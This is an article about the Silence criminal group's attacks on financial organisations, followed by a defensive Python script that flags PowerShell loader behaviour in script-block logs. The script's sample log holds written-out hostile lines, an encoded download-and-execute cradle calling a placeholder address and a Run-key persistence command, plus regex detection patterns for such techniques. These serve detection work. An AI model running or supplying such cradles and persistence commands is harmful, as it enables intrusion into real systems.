The Silence hackers are a dangerous criminal collective confirmed to be Russian-speaking and probably originating from a Slavic country. Their latest attacks target numerous financial organizations and institutions across a wide range of regions. The frequency of their campaigns has risen noticeably in the last few months.
Financial Organizations and Institutions Under Attack By The Silence Hackers Group
The Silence hackers group is a well-known collective of skilled criminals that conducts extensive, large-scale campaigns. Their first attacks were detected in 2016. Their campaigns run over several months and use advanced infiltration tactics. What is particularly worrying is that they are adept at using different tools and strategies to find weaknesses and exploit them. The Silence hackers appear to be interested not in home users at large, but in specific financial companies and organizations. In the latest attacks they have overhauled their methods and use a sophisticated intrusion scheme.
The Silence hackers deploy a complex malware sequence that starts as soon as the intrusion has been made. They are known for using several tools and techniques. Intrusion is often achieved by searching for vulnerabilities; if any are found, exploits are launched against them. If the criminals want to target specific users they can use phishing tactics such as emails. The messages are disguised as coming from clients, customers or partners.
As soon as a weakness is found, the Silence hackers deploy a PowerShell-based loader that performs a variety of malicious tasks:
- Command Execution — The scripts can launch all kinds of actions, including starting programs and interacting with programs and services.
- Traffic Redirect — It can redirect the Internet traffic generated by the host to a hacker-controlled server. This allows the criminals to spy on the victims in real time and gather all sent and received data.
- System Changes — Using the established infection, any other malicious changes to the affected programs can be made.
What is particularly dangerous about these infections is that they can be programmed to set up a persistent and secure connection to a server. This allows the criminals to take control of the computers, steal user data and deploy all kinds of threats. In this particular case these can be specific Trojans or system-affecting viruses that hijack user data. When large networks are affected, the engine may recruit them into an international botnet which can be used to launch devastating distributed denial-of-service (DDoS) attacks against other targets.
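As an added example (not code from the article or from any vendor report on this group), the following Python scans PowerShell script-block log lines for the loader behaviours described above: encoded command lines, download-and-execute cradles, hidden windows, execution-policy bypass and run-key or scheduled-task persistence. A line is only reported when several indicators coincide, so an ordinary administrative download is not flagged on its own. The sample log lines, the indicator names and the 203.0.113.5 address are constructed for this example and are not indicators from the Silence campaigns.

```python
import base64
import re

# Generic heuristic indicators of a PowerShell loader (constructed for this
# example; these are behaviour patterns, not IoCs from any specific campaign).
INDICATORS = {
    "encoded_command": re.compile(r"-(?:e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"(?:DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient)", re.I),
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "hidden_window": re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "persistence": re.compile(r"(?:CurrentVersion\\Run|Register-ScheduledTask|schtasks(?:\.exe)?\s+/create)", re.I),
}


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = INDICATORS["encoded_command"].search(text)
    if not m:
        return None
    b64 = m.group(0).split()[-1]
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script_block(text):
    """Return the indicator names matched by one script-block text.

    The decoded -EncodedCommand payload is scanned as well, so base64
    encoding alone does not hide a download cradle from the heuristics.
    """
    decoded = decode_encoded_command(text)
    haystack = text if decoded is None else text + "\n" + decoded
    return [name for name, rx in INDICATORS.items() if rx.search(haystack)]


def scan_log(lines, threshold=2):
    """Return (line_number, indicators) for lines matching >= threshold indicators."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = score_script_block(line)
        if len(found) >= threshold:
            hits.append((n, found))
    return hits


# Constructed sample telemetry in the shape of Event ID 4104 script-block
# entries. The payload and the 203.0.113.5 address are placeholders.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/ld.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_LOG = [
    "4104 ScriptBlock: Get-ChildItem C:\\Users\\finance\\Reports | Sort-Object LastWriteTime",
    f"4104 ScriptBlock: powershell.exe -NoP -W Hidden -Ep Bypass -Enc {ENCODED}",
    "4104 ScriptBlock: Set-ItemProperty HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
    "-Name Updater -Value 'powershell -w hidden -File C:\\Temp\\u.ps1'",
    "4104 ScriptBlock: Invoke-WebRequest -Uri https://intranet.example/backup.zip -OutFile C:\\Temp\\backup.zip",
]

if __name__ == "__main__":
    for n, found in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(found)}")
        decoded = decode_encoded_command(SAMPLE_LOG[n - 1])
        if decoded:
            print(f"  decoded payload: {decoded}")
```

Feeding real script-block logs through `scan_log` gives a first triage list; the threshold is the knob to tune against the false-positive rate of your own administrative scripts, and the decoded payload is what an analyst wants to read before deciding the line is a loader.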